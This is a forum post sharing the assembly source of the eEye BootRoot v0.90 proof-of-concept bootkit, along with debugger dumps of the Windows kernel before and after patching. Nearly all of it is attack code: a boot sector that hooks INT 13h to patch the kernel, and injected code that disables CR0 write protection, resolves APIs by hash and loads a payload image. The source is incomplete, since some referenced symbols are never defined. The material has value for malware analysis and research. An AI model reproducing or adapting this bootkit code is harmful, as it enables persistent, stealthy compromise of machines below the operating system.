Hi everyone.
In this thread I want to share with you the assembly code of this sample: eEye BootRoot v 0.90
This is the original kernel code:
Here is the Patched Kernel Code:
Thank you all for reading...
In this thread I want to share with you the assembly code of this sample: eEye BootRoot v 0.90
Code:
;===============================================================
; eEye BootRoot v0.90 Last updated: 08/08/2005
;---------------------------------------------------------------
; Demonstration of the capabilities of custom boot sector code
; on a Windows NT-family system.
;
; Derek Soeder - eEye Digital Security - 04/02/2005
;===============================================================
.486p
.model tiny
BOOTORG EQU 7C00h ; our code is executed by the BIOS at 0000h:7C00h
BOOTROOT_SIZE EQU 200h
BOOTROOT GROUP BRCODE16, BRDATA
ASSUME CS:BOOTROOT, DS:BOOTROOT, ES:BOOTROOT, SS:BOOTROOT
BRCODE16 SEGMENT byte use16
@BRCODE16_START EQU $
;###################################
;## Boot-Time Installation Code ##
;###################################
;
; Initialization
;
cli
xor bx, bx
mov ss, bx
mov ss:[BOOTORG - 2], sp
mov sp, (BOOTORG - 2)
push ds
pushad
mov ds, bx
; Reserve 1KB conventional memory for our memory-resident code
dec word ptr ds:[0413h] ; 0040h:0013h - base memory size in KBs
mov ax, ds:[0413h]
shl ax, (10-4) ; AX *= 1024 / 16 (convert linear address in KBs to a segment)
mov es, ax
; Copy ourselves to reserved memory and initialize the rest to zeroes
cld
mov si, BOOTORG
xor di, di
mov cx, BOOTROOT_SIZE / 2
rep movsw
xor ax, ax
mov ch, (1024 - BOOTROOT_SIZE) / 2 / 100h
rep stosw
; Install our INT 13h hook
mov eax, ds:[bx + (13h*4)]
mov es:[INT13HANDLER - @BRCODE16_START], eax ; store previous handler
mov word ptr [bx + (13h*4)], @Int13Hook ; point INT 13h vector to our hook handler
mov [bx + (13h*4) + 2], es ; (BX = 0 from earlier)
; Load and execute MBR from first hard drive (do this from resident code)
push es
push @BootFromHDD
retf
@BootFromHDD:
sti
mov es, cx ; CX = 0 from above REP STOSW
mov ax, 0201h ; AL = number of sectors
inc cx ; CH = cylinder; CL = sector and high bits of cylinder
mov dx, 0080h ; DH = head; DL = drive number
mov bh, (BOOTORG / 100h) ; ES:BX -> destination buffer
int 13h ; INT 13h/AH=02h: Read sector(s) into memory
popad
pop ds
pop sp
db 0EAh ; JMP FAR 0000h:7C00h
dw BOOTORG, 0000h
;##################################
;## INT 13h Hook Real-Mode ISR ##
;##################################
@Int13Hook:
pushf
cmp ah, 42h ; IBM/MS INT 13 Extensions - EXTENDED READ
je short @Int13Hook_ReadRequest
cmp ah, 02h ; DISK - READ SECTOR(S) INTO MEMORY
je short @Int13Hook_ReadRequest
popf
db 0EAh ; JMP FAR INT13HANDLER
INT13HANDLER EQU $
dd ?
@Int13Hook_ReadRequest:
mov byte ptr cs:[INT13LASTFUNCTION], ah
; Invoke original handler to perform read operation
popf
pushf ; push Flags because we're simulating an INT
call dword ptr cs:[INT13HANDLER] ; call original handler
jc short @Int13Hook_ret ; abort immediately if read failed
pushf
cli
push es
pusha
mov ah, 00h
INT13LASTFUNCTION EQU $-1
cmp ah, 42h
jne short @Int13Hook_notextread
lodsw
lodsw ; +02h WORD number of blocks to transfer
les bx, [si] ; +04h DWORD transfer buffer
@Int13Hook_notextread:
; Scan sector for a signature of the code we want to modify
test al, al
jle short @Int13Hook_scan_done
cld
mov cl, al
mov al, 8Bh
shl cx, 9 ; (AL * 200h)
mov di, bx
@Int13Hook_scan_loop:
; 8B F0 MOV ESI, EAX
; 85 F6 TEST ESI, ESI
; 74 21 JZ $+23h
; 80 3D ... CMP BYTE PTR [ofs32], imm8
; (the first 6 bytes of this signature exist in other modules!)
repne scasb
jne short @Int13Hook_scan_done
cmp dword ptr es:[di], 74F685F0h
jne short @Int13Hook_scan_loop
cmp word ptr es:[di+4], 8021h
jne short @Int13Hook_scan_loop
mov word ptr es:[di-1], 15FFh ; FFh/15h/xx/xx/xx/xx: CALL NEAR [ofs32]
mov eax, cs
shl eax, 4
add cs:[(NDISBACKDOOR_LINEAR - @BRPATCHFUNC32_START) + BRCODE16_SIZE], eax
add ax, (@PatchFunction - @BRPATCHFUNC32_START) + BRCODE16_SIZE
mov cs:[PATCHFUNC32_LINEAR], eax ; should be okay to add to AX, since we can't cross 1KB boundary
add ax, PATCHFUNC32_LINEAR - ((@PatchFunction - @BRPATCHFUNC32_START) + BRCODE16_SIZE)
mov es:[di+1], eax
@Int13Hook_scan_done:
popa
pop es
popf
@Int13Hook_ret:
retf 2 ; discard saved Flags from original INT (pass back CF, etc.)
@BRCODE16_END EQU $
BRCODE16_SIZE EQU (@BRCODE16_END - @BRCODE16_START)
BRCODE16 ENDS
This is the original kernel code:
Code:
806a0a79 0f85d9dcffff jne nt!Phase1Initialization+0x942 (8069e758)
806a0a7f e8f9650100 call nt!ExInitSystemPhase2 (806b707d)
806a0a84 6a19 push 0x19
806a0a86 e83af1e6ff call nt!InbvUpdateProgressBar (8050fbc5)
806a0a8b ffb590fbffff push dword ptr [ebp-0x470]
806a0a91 891d78cb5480 mov [nt!KdpTimeSlipPending (8054cb78)],ebx
806a0a97 e8cef30000 call nt!XIPInit (806afe6a)
806a0a9c 6a4b push 0x4b
806a0a9e 6a19 push 0x19
806a0aa0 e83cf1e6ff call nt!InbvSetProgressBarSubset (8050fbe1)
806a0aa5 ffb590fbffff push dword ptr [ebp-0x470]
806a0aab e844e6ffff call nt!IoInitSystem (8069f0f4)
806a0ab0 84c0 test al,al
806a0ab2 0f84e7dcffff je nt!Phase1Initialization+0x9b9 (8069e79f)
806a0ab8 6a64 push 0x64
806a0aba 53 push ebx
806a0abb e821f1e6ff call nt!InbvSetProgressBarSubset (8050fbe1)
806a0ac0 391d007f5580 cmp [nt!InitSafeBootMode (80557f00)],ebx
806a0ac6 be3f000f00 mov esi,0xf003f
806a0acb 0f85d5dcffff jne nt!Phase1Initialization+0x9d9 (8069e7a6)
806a0ad1 381d142b5580 cmp [nt!InitIsWinPEMode (80552b14)],bl
806a0ad7 0f8563deffff jne nt!Phase1Initialization+0xb76 (8069e940)
806a0add 8bb590fbffff mov esi,[ebp-0x470]
806a0ae3 56 push esi
806a0ae4 6a02 push 0x2
806a0ae6 e82c020000 call nt!MmInitSystem (806a0d17)
806a0aeb 6a50 push 0x50
806a0aed e8d3f0e6ff call nt!InbvUpdateProgressBar (8050fbc5)
806a0af2 e8fb070000 call nt!KeI386VdmInitialize (806a12f2)
806a0af7 e8f11e0000 call nt!KiLogMcaErrors (806a29ed)
806a0afc 6a01 push 0x1
806a0afe e85cf1ffff call nt!PoInitSystem (8069fc5f)
806a0b03 84c0 test al,al
806a0b05 0f8419daffff je nt!Phase1Initialization+0x259 (8069e524)
806a0b0b 56 push esi
Here is the Patched Kernel Code:
Code:
806a0a79 0f85d9dcffff jne nt!Phase1Initialization+0x942 (8069e758)
806a0a7f e8f9650100 call nt!ExInitSystemPhase2 (806b707d)
806a0a84 6a19 push 0x19
806a0a86 e83af1e6ff call nt!InbvUpdateProgressBar (8050fbc5)
806a0a8b ffb590fbffff push dword ptr [ebp-0x470]
806a0a91 891d78cb5480 mov [nt!KdpTimeSlipPending (8054cb78)],ebx
806a0a97 e8cef30000 call nt!XIPInit (806afe6a)
806a0a9c 6a4b push 0x4b
806a0a9e 6a19 push 0x19
806a0aa0 e83cf1e6ff call nt!InbvSetProgressBarSubset (8050fbe1)
806a0aa5 ffb590fbffff push dword ptr [ebp-0x470]
806a0aab e850b30400 call 806ebe00
806a0ab0 84c0 test al,al
806a0ab2 0f84e7dcffff je nt!Phase1Initialization+0x9b9 (8069e79f)
806a0ab8 6a64 push 0x64
806a0aba 53 push ebx
806a0abb e821f1e6ff call nt!InbvSetProgressBarSubset (8050fbe1)
806a0ac0 391d007f5580 cmp [nt!InitSafeBootMode (80557f00)],ebx
806a0ac6 be3f000f00 mov esi,0xf003f
806a0acb 0f85d5dcffff jne nt!Phase1Initialization+0x9d9 (8069e7a6)
806a0ad1 381d142b5580 cmp [nt!InitIsWinPEMode (80552b14)],bl
806a0ad7 0f8563deffff jne nt!Phase1Initialization+0xb76 (8069e940)
806a0add 8bb590fbffff mov esi,[ebp-0x470]
806a0ae3 56 push esi
806a0ae4 6a02 push 0x2
806a0ae6 e82c020000 call nt!MmInitSystem (806a0d17)
806a0aeb 6a50 push 0x50
806a0aed e8d3f0e6ff call nt!InbvUpdateProgressBar (8050fbc5)
806a0af2 e8fb070000 call nt!KeI386VdmInitialize (806a12f2)
806a0af7 e8f11e0000 call nt!KiLogMcaErrors (806a29ed)
806a0afc 6a01 push 0x1
806a0afe e85cf1ffff call nt!PoInitSystem (8069fc5f)
806a0b03 84c0 test al,al
806a0b05 0f8419daffff je nt!Phase1Initialization+0x259 (8069e524)
806a0b0b 56 push esi
806ebd60 85 0c fe f8 ff 83 f8 10 0f 82 de fd f8 ff 83 7e ...............~
806ebd70 0c 00 0f 85 f9 fd f8 ff e9 cf fd f8 ff e9 eb fd ................
806ebd80 f8 ff 8b cf e8 07 64 ef ff e9 ed fd f8 ff 80 7d ......d........}
806ebd90 ff 00 0f 84 f0 fd f8 ff 8b 45 08 8b 40 0c 85 c0 .........E..@...
806ebda0 0f 84 ee 88 fa ff 8b 40 08 85 c0 0f 84 e3 88 fa .......@........
806ebdb0 ff 6a 01 50 e8 8c 0d f0 ff e9 d6 88 fa ff ff 75 .j.P...........u
806ebdc0 f8 8d 85 cc fe ff ff 50 e8 36 a3 f4 ff e9 c8 fd .......P.6......
806ebdd0 f8 ff 64 a1 24 01 00 00 ff 80 d4 00 00 00 0f 85 ..d.$...........
806ebde0 cc fd f8 ff 8d 48 34 39 09 0f 84 c1 fd f8 ff b1 .....H49........
806ebdf0 01 c6 40 49 01 ff 15 54 06 40 00 e9 b0 fd f8 ff ..@I...T.@......
806ebe00 8b 14 24 68 f4 f0 69 80 8b 0c 24 68 00 70 4d 80 ..$h..i...$h.pM. <--- hooked nt!IoInitSystem
806ebe10 0f 20 c0 50 25 ff ff fe ff 0f 22 c0 2b ca 58 0f . .P%.....".+.X.
806ebe20 22 c0 ff 34 24 68 62 e0 07 37 e8 3b 00 00 00 59 "..4$hb..7.;...Y
806ebe30 59 68 ab 01 00 00 6a 00 ff d0 60 e8 00 00 00 00 Yh....j...`.....
806ebe40 5e 83 c6 15 8b f8 6a 6a 59 f3 a5 b1 80 8d be 00 ^.....jjY.......
806ebe50 fe ff ff ff e0 33 c0 61 ff 74 24 0c ff 54 24 08 .....3.a.t$..T$.
806ebe60 59 5a 60 87 cd e8 52 00 00 00 60 8b 6c 24 28 8b YZ`...R...`.l$(.
806ebe70 45 3c 8b 54 05 78 03 d5 8b 4a 18 8b 5a 20 03 dd E<.T.x...J..Z ..
806ebe80 e3 32 49 8b 34 8b 03 f5 33 ff fc 33 c0 ac 3a c4 .2I.4...3..3..:.
806ebe90 74 07 c1 cf 0d 03 f8 eb f2 3b 7c 24 24 75 e1 8b t........;|$$u..
806ebea0 5a 24 03 dd 66 8b 0c 4b 8b 5a 1c 03 dd 8b 04 8b Z$..f..K.Z......
806ebeb0 03 c5 eb 02 33 c0 89 44 24 1c 61 c3 5b 55 68 b8 ....3..D$.a.[Uh.
806ebec0 74 29 85 ff d3 33 d2 52 52 8b f4 52 8b fc e8 26 t)...3.RR..R...&
806ebed0 00 00 00 5c 00 3f 00 3f 00 5c 00 50 00 68 00 79 ...\.?.?.\.P.h.y
806ebee0 00 73 00 69 00 63 00 61 00 6c 00 44 00 72 00 69 .s.i.c.a.l.D.r.i
806ebef0 00 76 00 65 00 30 00 00 00 68 24 00 26 00 8b cc .v.e.0...h$.&...
806ebf00 52 52 6a 40 51 52 6a 18 8b cc 6a 20 6a 03 56 51 RRj@QRj...j j.VQ
806ebf10 68 00 00 10 80 57 ff d0 55 68 62 e0 07 37 ff d3 h....W..Uhb..7..
806ebf20 97 55 68 16 d5 fc 84 ff d3 89 06 68 00 00 00 00 .Uh........h....
806ebf30 68 00 00 b9 7f 8b cc 6a 00 51 b9 00 bc 03 00 51 h......j.Q.....Q
806ebf40 51 6a 00 ff d7 50 56 8b ce 96 33 d2 52 52 52 ff Qj...PV...3.RRR.
806ebf50 74 24 58 ff 11 55 68 5f 4c d4 dc ff d3 ff 74 24 t$X..Uh_L.....t$
806ebf60 40 ff d0 8b 46 3c 03 c6 50 8b 50 50 52 52 6a 00 @...F<..P.PPRRj.
806ebf70 ff d7 97 59 57 32 c0 f3 aa 5f 58 60 8b 48 54 f3 ...YW2..._X`.HT.
806ebf80 a4 61 2b c6 03 c7 0f b7 48 06 8d 90 f8 00 00 00 .a+.....H.......
806ebf90 60 03 72 14 03 7a 0c 8b 4a 10 e3 02 f3 a4 61 83 `.r..z..J.....a.
806ebfa0 c2 28 e2 ec 50 60 8b fe 91 b9 00 ef 00 00 f3 ab .(..P`..........
806ebfb0 61 55 68 1f 9d 48 9d ff d3 95 56 ff d5 8b 74 24 aUh..H....V...t$
806ebfc0 08 ff b4 24 84 00 00 00 57 8b 46 28 03 c7 ff d0 ...$....W.F(....
806ebfd0 0b c0 7d 0e 8b 4e 50 e3 09 32 c0 57 f3 aa 5f 57 ..}..NP..2.W.._W
806ebfe0 ff d5 83 c4 60 33 c0 8b fb 83 ef 15 b9 9c 01 00 ....`3..........
806ebff0 00 f3 aa 61 c2 04 00 00 00 00 00 00 00 00 00 00 ...a............
806ec000 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 MZ.............. <--- 806ec000 806ffd80 hal
806ec010 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 ........@.......
806ec020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
806ec030 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 ................
806ec040 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 ........!..L.!Th
806ec050 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f is program canno
806ec060 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 t be run in DOS
806ec070 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 mode....$.......
806ebe00 8b1424 mov edx,[esp]
806ebe03 68f4f06980 push 0x8069f0f4
806ebe08 8b0c24 mov ecx,[esp]
806ebe0b 6800704d80 push 0x804d7000
806ebe10 0f20c0 mov eax,cr0
806ebe13 50 push eax
806ebe14 25fffffeff and eax,0xfffeffff
806ebe19 0f22c0 mov cr0,eax ; disable code write protection
806ebe1c 2bca sub ecx,edx
806ebe1e 58 pop eax
806ebe1f 0f22c0 mov cr0,eax
806ebe22 ff3424 push dword ptr [esp]
806ebe25 6862e00737 push 0x3707e062
806ebe2a e83b000000 call 806ebe6a
806ebe2f 59 pop ecx
806ebe30 59 pop ecx
806ebe31 68ab010000 push 0x1ab
806ebe36 6a00 push 0x0
806ebe38 ffd0 call eax {nt!ExAllocatePool (8050fd66)}
806ebe3a 60 pushad
806ebe3b e800000000 call 806ebe40
806ebe40 5e pop esi
806ebe41 83c615 add esi,0x15
806ebe44 8bf8 mov edi,eax
806ebe46 6a6a push 0x6a
806ebe48 59 pop ecx
806ebe49 f3a5 rep movsd
806ebe4b b180 mov cl,0x80
806ebe4d 8dbe00feffff lea edi,[esi-0x200]
806ebe53 ffe0 jmp eax {81bf06d0}
81bf06d0 33c0 xor eax,eax
81bf06d2 61 popad
81bf06d3 ff74240c push dword ptr [esp+0xc]
81bf06d7 ff542408 call dword ptr [esp+0x8]{nt!IoInitSystem (8069f0f4)} ss:0010:f9e6383c=8069f0f4
81bf06db 59 pop ecx
81bf06dc 5a pop edx
81bf06dd 60 pushad
81bf06de 87cd xchg ebp,ecx
81bf06e0 e852000000 call 81bf0737
81bf06e5 60 pushad
81bf06e6 8b6c2428 mov ebp,[esp+0x28]
81bf06ea 8b453c mov eax,[ebp+0x3c]
81bf06ed 8b540578 mov edx,[ebp+eax+0x78]
81bf06f1 03d5 add edx,ebp
81bf06f3 8b4a18 mov ecx,[edx+0x18]
81bf06f6 8b5a20 mov ebx,[edx+0x20]
81bf06f9 03dd add ebx,ebp
81bf06fb e332 jecxz 81bf072f
81bf06fd 49 dec ecx
81bf06fe 8b348b mov esi,[ebx+ecx*4]
81bf0701 03f5 add esi,ebp
81bf0703 33ff xor edi,edi
81bf0705 fc cld
81bf0706 33c0 xor eax,eax
81bf0708 ac lodsb
81bf0709 3ac4 cmp al,ah
81bf070b 7407 jz 81bf0714
81bf070d c1cf0d ror edi,0xd
81bf0710 03f8 add edi,eax
81bf0712 ebf2 jmp 81bf0706
81bf0714 3b7c2424 cmp edi,[esp+0x24]
81bf0718 75e1 jnz 81bf06fb
81bf071a 8b5a24 mov ebx,[edx+0x24]
81bf071d 03dd add ebx,ebp
81bf071f 668b0c4b mov cx,[ebx+ecx*2]
81bf0723 8b5a1c mov ebx,[edx+0x1c]
81bf0726 03dd add ebx,ebp
81bf0728 8b048b mov eax,[ebx+ecx*4]
81bf072b 03c5 add eax,ebp
81bf072d eb02 jmp 81bf0731
81bf072f 33c0 xor eax,eax
81bf0731 8944241c mov [esp+0x1c],eax
81bf0735 61 popad
81bf0736 c3 ret
Thank you all for reading...